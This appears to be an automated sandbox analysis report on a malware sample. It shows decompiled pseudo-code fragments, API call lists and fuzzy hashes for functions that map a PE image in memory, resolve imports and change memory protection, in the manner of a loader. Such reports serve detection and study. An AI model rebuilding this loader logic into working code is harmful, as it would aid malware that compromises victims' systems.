                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E313772900159AFCF11DFA8C888C9BBB7AFBC97447144698FA159B314D336DD61CBA0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                                        			E026F3695(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                                        				short _t19;
                                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                                        				short* _t26;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t25 = E026FA5A3(0, _a12);
                                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                                        					_t23 = 8;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t26 = _t25 + _a16 * 2;
                                                                                                                                                                                                                        					 *_t26 = 0; // executed
                                                                                                                                                                                                                        					_t16 = E026F48E2(__ecx, _a4, _a8, _t25); // executed
                                                                                                                                                                                                                        					_t23 = _t16;
                                                                                                                                                                                                                        					if(_t23 == 0) {
                                                                                                                                                                                                                        						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                        						_t19 = 0x5f;
                                                                                                                                                                                                                        						 *_t26 = _t19;
                                                                                                                                                                                                                        						_push( &_v12);
                                                                                                                                                                                                                        						_t23 = E026F3D94(8, _a4, 0x80000001, _a8, _t25);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, 0, _t25);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                        0x026f36a8
                                                                                                                                                                                                                        0x026f36ac
                                                                                                                                                                                                                        0x026f3708
                                                                                                                                                                                                                        0x026f36ae
                                                                                                                                                                                                                        0x026f36b5
                                                                                                                                                                                                                        0x026f36bd
                                                                                                                                                                                                                        0x026f36c0
                                                                                                                                                                                                                        0x026f36c5
                                                                                                                                                                                                                        0x026f36c9
                                                                                                                                                                                                                        0x026f36cf
                                                                                                                                                                                                                        0x026f36d7
                                                                                                                                                                                                                        0x026f36d8
                                                                                                                                                                                                                        0x026f36de
                                                                                                                                                                                                                        0x026f36f3
                                                                                                                                                                                                                        0x026f36f3
                                                                                                                                                                                                                        0x026f36fe
                                                                                                                                                                                                                        0x026f36fe
                                                                                                                                                                                                                        0x026f370f

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: lstrlen.KERNEL32(?,00000000,026FD330,00000001,026F453C,026FD00C,026FD00C,00000000,00000005,00000000,00000000,?,?,?,026F857A,?), ref: 026FA5AC
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: mbstowcs.NTDLL ref: 026FA5D3
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: memset.NTDLL ref: 026FA5E5
                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,04B3934C), ref: 026F36CF
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,04B3934C), ref: 026F36FE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1500278894-0
                                                                                                                                                                                                                        • Opcode ID: 191bae77704e8dae1fea3cd6f1a6c0858b1993bf17ba5edc7f165cf170651aac
                                                                                                                                                                                                                        • Instruction ID: a3d1b6546556b9b463b01a843d9fcf55ad3c26588be21fb2e75ee3a813e05455
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 191bae77704e8dae1fea3cd6f1a6c0858b1993bf17ba5edc7f165cf170651aac
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66019236610249BADF515FA89C44E8B7BB9EF84714F100826F704DA250E771D564C750
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                                                                                                        			E026F59CA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				void* _v18;
                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosw");
                                                                                                                                                                                                                        				_t15 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t4 = _t15 + 0x26fe39c; // 0x4b38944
                                                                                                                                                                                                                        				_t20 = _t4;
                                                                                                                                                                                                                        				_t6 = _t15 + 0x26fe124; // 0x650047
                                                                                                                                                                                                                        				_t17 = E026F37B4(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                        				if(_t17 < 0) {
                                                                                                                                                                                                                        					_t23 = _t17;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t23 = 8;
                                                                                                                                                                                                                        					if(_v20 != _t23) {
                                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t19 = E026F2476(_t20, _v12);
                                                                                                                                                                                                                        						if(_t19 != 0) {
                                                                                                                                                                                                                        							 *_a16 = _t19;
                                                                                                                                                                                                                        							_t23 = 0;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						__imp__#6(_v12);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                        0x026f59d4
                                                                                                                                                                                                                        0x026f59db
                                                                                                                                                                                                                        0x026f59dc
                                                                                                                                                                                                                        0x026f59dd
                                                                                                                                                                                                                        0x026f59de
                                                                                                                                                                                                                        0x026f59e4
                                                                                                                                                                                                                        0x026f59e9
                                                                                                                                                                                                                        0x026f59e9
                                                                                                                                                                                                                        0x026f59f3
                                                                                                                                                                                                                        0x026f5a05
                                                                                                                                                                                                                        0x026f5a0c
                                                                                                                                                                                                                        0x026f5a3a
                                                                                                                                                                                                                        0x026f5a0e
                                                                                                                                                                                                                        0x026f5a10
                                                                                                                                                                                                                        0x026f5a15
                                                                                                                                                                                                                        0x026f5a37
                                                                                                                                                                                                                        0x026f5a17
                                                                                                                                                                                                                        0x026f5a1a
                                                                                                                                                                                                                        0x026f5a21
                                                                                                                                                                                                                        0x026f5a26
                                                                                                                                                                                                                        0x026f5a28
                                                                                                                                                                                                                        0x026f5a28
                                                                                                                                                                                                                        0x026f5a2d
                                                                                                                                                                                                                        0x026f5a2d
                                                                                                                                                                                                                        0x026f5a15
                                                                                                                                                                                                                        0x026f5a41

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F37B4: SysFreeString.OLEAUT32(?), ref: 026F3893
                                                                                                                                                                                                                          • Part of subcall function 026F2476: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,026F4942,004F0053,00000000,?), ref: 026F247F
                                                                                                                                                                                                                          • Part of subcall function 026F2476: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,026F4942,004F0053,00000000,?), ref: 026F24A9
                                                                                                                                                                                                                          • Part of subcall function 026F2476: memset.NTDLL ref: 026F24BD
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F5A2D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 397948122-0
                                                                                                                                                                                                                        • Opcode ID: 98f5112c84e3bf3c62943fe79b11499cbb5668d474e0ce443c059221b64b793f
                                                                                                                                                                                                                        • Instruction ID: 23075180a7802b517bcffbd79dced433d9de81976ecb0259fc1f3f1f36b3c11c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98f5112c84e3bf3c62943fe79b11499cbb5668d474e0ce443c059221b64b793f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C015E32500219BFDF91DFA9CC459AEBBB9FF04254B404425EA06E6260E7729D26CB90
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                        			E021917EF(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				 *0x2194150 =  *0x2194150 & 0x00000000;
                                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                                        				_push(0x219414c);
                                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                                                        				 *0x2194148 = 0xc; // executed
                                                                                                                                                                                                                        				L021911E4(); // executed
                                                                                                                                                                                                                        				return __eax;
                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                        0x021917ef
                                                                                                                                                                                                                        0x021917f6
                                                                                                                                                                                                                        0x021917f8
                                                                                                                                                                                                                        0x021917fd
                                                                                                                                                                                                                        0x021917ff
                                                                                                                                                                                                                        0x02191803
                                                                                                                                                                                                                        0x0219180d
                                                                                                                                                                                                                        0x02191812

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(021912AD,00000001,0219414C,00000000), ref: 0219180D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3907675253-0
                                                                                                                                                                                                                        • Opcode ID: c166ce73d0908ca1f3aa4fb439a7f168fac1b8466dc80320f4b5beb1a47ff0ad
                                                                                                                                                                                                                        • Instruction ID: 5ef32790ce94e804be90aeedd4135c6cf169c0be52a011d8dd5ecec6c6c23d58
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c166ce73d0908ca1f3aa4fb439a7f168fac1b8466dc80320f4b5beb1a47ff0ad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBC04C745C0341BAFA219B909C45F467B917761B05F110925F114356D0C3F530A58D19
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F6D10(long _a4) {
                                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t2 = RtlAllocateHeap( *0x26fd238, 0, _a4); // executed
                                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                                        			}




                                                                                                                                                                                                                        0x026f6d1c
                                                                                                                                                                                                                        0x026f6d22

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                        • Opcode ID: 3e0548bd39951c85af66438b380d7b7abd9d4bfa62f2f54a7319dcbd77828f1d
                                                                                                                                                                                                                        • Instruction ID: 17f7ede97646da4e9bbaceda308c9fcd682b6cb77b87400c49ee144ca49cc227
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e0548bd39951c85af66438b380d7b7abd9d4bfa62f2f54a7319dcbd77828f1d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92B012318C0100FBCF418F00DD09F0DBB21AF50700F01A811B30004070833354B1EB15
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                                        			E02191151(void* __eax) {
                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                        				intOrPtr* _t35;
                                                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t34 = __eax;
                                                                                                                                                                                                                        				_t17 = E02191C1F( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                                                                                                        					_t28 = 8;
                                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t33 = _v8;
                                                                                                                                                                                                                        					_t28 = E02191984( &_v8, _t33, _t34);
                                                                                                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                                                                                                        						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                                                                                                                                                        						_t28 = E02191D05(_t33, _t37);
                                                                                                                                                                                                                        						if(_t28 == 0) {
                                                                                                                                                                                                                        							_t25 = E02191338(_t37, _t33); // executed
                                                                                                                                                                                                                        							_t28 = _t25;
                                                                                                                                                                                                                        							if(_t28 == 0) {
                                                                                                                                                                                                                        								_push(_t25);
                                                                                                                                                                                                                        								_push(1);
                                                                                                                                                                                                                        								_push(_t33);
                                                                                                                                                                                                                        								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                                                                                                                                                                                                        									_t28 = GetLastError();
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t35 = _v12;
                                                                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                                                                                                                                                                                                        					E02191628(_t35);
                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                        					return _t28;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                        0x02191159
                                                                                                                                                                                                                        0x02191176
                                                                                                                                                                                                                        0x0219117d
                                                                                                                                                                                                                        0x021911dc
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219117f
                                                                                                                                                                                                                        0x0219117f
                                                                                                                                                                                                                        0x02191189
                                                                                                                                                                                                                        0x0219118d
                                                                                                                                                                                                                        0x02191192
                                                                                                                                                                                                                        0x0219119b
                                                                                                                                                                                                                        0x0219119f
                                                                                                                                                                                                                        0x021911a4
                                                                                                                                                                                                                        0x021911a9
                                                                                                                                                                                                                        0x021911ad
                                                                                                                                                                                                                        0x021911b2
                                                                                                                                                                                                                        0x021911b3
                                                                                                                                                                                                                        0x021911b7
                                                                                                                                                                                                                        0x021911bc
                                                                                                                                                                                                                        0x021911c4
                                                                                                                                                                                                                        0x021911c4
                                                                                                                                                                                                                        0x021911bc
                                                                                                                                                                                                                        0x021911ad
                                                                                                                                                                                                                        0x0219119f
                                                                                                                                                                                                                        0x021911c6
                                                                                                                                                                                                                        0x021911cf
                                                                                                                                                                                                                        0x021911d3
                                                                                                                                                                                                                        0x021911dd
                                                                                                                                                                                                                        0x021911e3
                                                                                                                                                                                                                        0x021911e3

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02191C1F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0219117B,?,?,?,?,00000002,?,?), ref: 02191C44
                                                                                                                                                                                                                          • Part of subcall function 02191C1F: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191C66
                                                                                                                                                                                                                          • Part of subcall function 02191C1F: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191C7C
                                                                                                                                                                                                                          • Part of subcall function 02191C1F: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191C92
                                                                                                                                                                                                                          • Part of subcall function 02191C1F: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191CA8
                                                                                                                                                                                                                          • Part of subcall function 02191C1F: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0219117B,?,?,?,?,00000002), ref: 02191CBE
                                                                                                                                                                                                                          • Part of subcall function 02191984: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,02191189,?,?,?,?,?,?,00000002), ref: 021919BB
                                                                                                                                                                                                                          • Part of subcall function 02191984: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 021919F0
                                                                                                                                                                                                                          • Part of subcall function 02191D05: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 02191D3B
                                                                                                                                                                                                                          • Part of subcall function 02191D05: lstrlenA.KERNEL32(?), ref: 02191D51
                                                                                                                                                                                                                          • Part of subcall function 02191D05: memset.NTDLL ref: 02191D5B
                                                                                                                                                                                                                          • Part of subcall function 02191D05: GetProcAddress.KERNEL32(?,00000002), ref: 02191DBE
                                                                                                                                                                                                                          • Part of subcall function 02191D05: lstrlenA.KERNEL32(-00000002), ref: 02191DD3
                                                                                                                                                                                                                          • Part of subcall function 02191D05: memset.NTDLL ref: 02191DDD
                                                                                                                                                                                                                          • Part of subcall function 02191338: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 02191366
                                                                                                                                                                                                                          • Part of subcall function 02191338: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 021913BE
                                                                                                                                                                                                                          • Part of subcall function 02191338: GetLastError.KERNEL32 ref: 021913C4
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 021911BE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 33504255-0
                                                                                                                                                                                                                        • Opcode ID: 312c3fd7c2b246bedc900a8563b45cdb59d2ead7e0a8ea148ece3481cab30399
                                                                                                                                                                                                                        • Instruction ID: d4e4365a00e5d4277c1dcc1d04b179d1f3807637270e41ec477ec7ea04aeb62b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 312c3fd7c2b246bedc900a8563b45cdb59d2ead7e0a8ea148ece3481cab30399
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D118A72A407167FDF216AB98C84EAB76FCAF54254B440574E909D3340EB50ED85CB90
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                                        			E026F4509(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                                        				signed short _t11;
                                                                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                                        				signed short* _t22;
                                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                                        				_t19 = 1;
                                                                                                                                                                                                                        				_t27 = 0x26fd330;
                                                                                                                                                                                                                        				E026F3D1E();
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t8 = E026F523B(_a4,  &_v8); // executed
                                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_push(_v8);
                                                                                                                                                                                                                        					_t14 = 0xd;
                                                                                                                                                                                                                        					_t15 = E026FA5A3(_t14);
                                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                                        						HeapFree( *0x26fd238, 0, _v8);
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						 *_t27 = _t15;
                                                                                                                                                                                                                        						_t27 = _t27 + 4;
                                                                                                                                                                                                                        						_t24 = _t24 + 1;
                                                                                                                                                                                                                        						if(_t24 < 3) {
                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                                                        					E026F3D1E();
                                                                                                                                                                                                                        					if(_t19 != 0) {
                                                                                                                                                                                                                        						_t22 =  *0x26fd338; // 0x4b39b60
                                                                                                                                                                                                                        						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                                                        						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                        							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						 *_t22 = _t12;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					return _t19;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t19 = 0;
                                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                        0x026f4511
                                                                                                                                                                                                                        0x026f4515
                                                                                                                                                                                                                        0x026f4516
                                                                                                                                                                                                                        0x026f4517
                                                                                                                                                                                                                        0x026f451c
                                                                                                                                                                                                                        0x026f4521
                                                                                                                                                                                                                        0x026f4528
                                                                                                                                                                                                                        0x026f452f
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4531
                                                                                                                                                                                                                        0x026f4536
                                                                                                                                                                                                                        0x026f4537
                                                                                                                                                                                                                        0x026f453e
                                                                                                                                                                                                                        0x026f4558
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4540
                                                                                                                                                                                                                        0x026f4540
                                                                                                                                                                                                                        0x026f4542
                                                                                                                                                                                                                        0x026f4545
                                                                                                                                                                                                                        0x026f4549
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f454b
                                                                                                                                                                                                                        0x026f4549
                                                                                                                                                                                                                        0x026f4560
                                                                                                                                                                                                                        0x026f4560
                                                                                                                                                                                                                        0x026f4562
                                                                                                                                                                                                                        0x026f4569
                                                                                                                                                                                                                        0x026f456b
                                                                                                                                                                                                                        0x026f4571
                                                                                                                                                                                                                        0x026f4578
                                                                                                                                                                                                                        0x026f4588
                                                                                                                                                                                                                        0x026f4580
                                                                                                                                                                                                                        0x026f4583
                                                                                                                                                                                                                        0x026f4583
                                                                                                                                                                                                                        0x026f458b
                                                                                                                                                                                                                        0x026f458b
                                                                                                                                                                                                                        0x026f4594
                                                                                                                                                                                                                        0x026f4594
                                                                                                                                                                                                                        0x026f455e
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F3D1E: GetProcAddress.KERNEL32(36776F57,026F4521), ref: 026F3D39
                                                                                                                                                                                                                          • Part of subcall function 026F523B: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 026F5266
                                                                                                                                                                                                                          • Part of subcall function 026F523B: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 026F5288
                                                                                                                                                                                                                          • Part of subcall function 026F523B: memset.NTDLL ref: 026F52A2
                                                                                                                                                                                                                          • Part of subcall function 026F523B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 026F52E0
                                                                                                                                                                                                                          • Part of subcall function 026F523B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 026F52F4
                                                                                                                                                                                                                          • Part of subcall function 026F523B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 026F530B
                                                                                                                                                                                                                          • Part of subcall function 026F523B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 026F5317
                                                                                                                                                                                                                          • Part of subcall function 026F523B: lstrcat.KERNEL32(?,642E2A5C), ref: 026F5358
                                                                                                                                                                                                                          • Part of subcall function 026F523B: FindFirstFileA.KERNELBASE(?,?), ref: 026F536E
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: lstrlen.KERNEL32(?,00000000,026FD330,00000001,026F453C,026FD00C,026FD00C,00000000,00000005,00000000,00000000,?,?,?,026F857A,?), ref: 026FA5AC
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: mbstowcs.NTDLL ref: 026FA5D3
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: memset.NTDLL ref: 026FA5E5
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,026FD00C,026FD00C,026FD00C,00000000,00000005,00000000,00000000,?,?,?,026F857A,?,026FD00C,?,?), ref: 026F4558
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 983081259-0
                                                                                                                                                                                                                        • Opcode ID: dd8b966bc03757c718068f1bb156bbfbe020a309e87d7ffb64df3874b978a349
                                                                                                                                                                                                                        • Instruction ID: f5ffd4bfa4d7d0bf17d028c9b6f0e595a7f187ca8915d567cbf908064018c59e
